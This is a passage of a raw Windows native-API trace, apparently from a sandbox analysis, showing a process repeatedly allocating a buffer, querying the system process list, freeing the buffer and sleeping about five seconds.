BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.527] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.530] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.531] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.534] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.534] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.538] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.538] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.540] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.541] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.545] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.546] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.548] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.548] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.552] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.553] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.554] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.555] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.559] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.559] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.561] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.561] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.561] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.562] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.562] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.565] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.566] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.568] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.569] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.574] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.576] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.580] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.580] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.582] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.583] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.583] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.587] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.588] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.589] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.590] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.590] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.595] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.595] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.602] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.603] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.605] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.606] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.606] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.612] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.614] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.615] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.615] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.620] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.621] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.623] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.623] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.626] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.626] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.632] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.632] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.634] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.635] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.635] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.639] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.641] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.641] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.642] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.642] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.647] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.647] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.649] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.654] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.655] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.656] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.657] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.657] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.663] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.762] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.765] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.772] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.773] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.775] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.775] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.776] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.776] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.777] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.782] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.783] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.784] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.785] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.786] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.786] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.794] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.796] NtQuerySystemInformation (in: 